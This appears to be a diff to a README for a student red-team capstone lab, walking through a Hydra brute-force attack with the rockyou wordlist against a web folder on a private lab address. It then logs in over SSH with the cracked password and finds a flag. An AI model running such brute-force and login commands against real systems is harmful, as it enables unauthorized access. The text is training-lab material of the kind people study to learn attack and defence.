rochoabanuelos/Capstone-Engagement/README.md

 ## Launching Brute Force Attack
 We know that Ashton has access to the *secret_folder*, as stated when attempting to login.
 So I utilized the Hydra tool to launch the attack with the commonly used passwords list.

-'hydra -l ashton -P /opt/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder'
+`hydra -l ashton -P /opt/rockyou.txt -s 80 -f -vV 192.168.1.105 http-get /company_folders/secret_folder`

 ![alt text](https://github.com/rochoabanuelos/Red-Team-vs-Blue-Team-Analysis/blob/main/RED/10.PNG)

 Password has been found to be *leopoldo*

 ## SSH into webserver using Ashton's login info

-'ssh ashton@192.168.1.105'
+`ssh ashton@192.168.1.105`

 Once logged in I notice something sitting in the *home* directory.

 ### Flag1
 ![alt text](https://github.com/rochoabanuelos/Red-Team-vs-Blue-Team-Analysis/blob/main/RED/28.png)